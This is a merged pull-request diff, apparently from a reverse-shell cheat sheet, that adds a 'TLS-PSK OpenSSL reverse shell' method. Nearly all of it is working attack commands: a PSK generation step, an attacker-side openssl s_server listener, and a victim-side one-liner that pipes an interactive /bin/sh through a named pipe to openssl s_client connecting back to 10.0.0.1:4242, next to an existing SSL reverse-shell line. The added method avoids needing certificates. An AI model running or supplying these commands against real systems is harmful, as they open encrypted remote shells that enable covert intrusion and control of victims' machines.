Merge pull request #225 from artiommocrenco/patch-1
Add TLS-PSK OpenSSL reverse shell methodpatch-1
commit
cd3de64c73
|
@ -175,6 +175,17 @@ user@attack$ ncat --ssl -vv -l -p 4242
|
|||
user@victim$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.0.0.1:4242 > /tmp/s; rm /tmp/s
|
||||
```
|
||||
|
||||
TLS-PSK (does not rely on PKI or self-signed certificates)
|
||||
```bash
|
||||
# generate 384-bit PSK
|
||||
# use the generated string as a value for the two PSK variables from below
|
||||
openssl rand -hex 48
|
||||
# server (attacker)
|
||||
export LHOST="*"; export LPORT="4242"; export PSK="replacewithgeneratedpskfromabove"; openssl s_server -quiet -tls1_2 -cipher PSK-CHACHA20-POLY1305:PSK-AES256-GCM-SHA384:PSK-AES256-CBC-SHA384:PSK-AES128-GCM-SHA256:PSK-AES128-CBC-SHA256 -psk $PSK -nocert -accept $LHOST:$LPORT
|
||||
# client (victim)
|
||||
export RHOST="10.0.0.1"; export RPORT="4242"; export PSK="replacewithgeneratedpskfromabove"; export PIPE="/tmp/`openssl rand -hex 4`"; mkfifo $PIPE; /bin/sh -i < $PIPE 2>&1 | openssl s_client -quiet -tls1_2 -psk $PSK -connect $RHOST:$RPORT > $PIPE; rm $PIPE
|
||||
```
|
||||
|
||||
### Powershell
|
||||
|
||||
```powershell
|
||||
|
|
Loading…
Reference in New Issue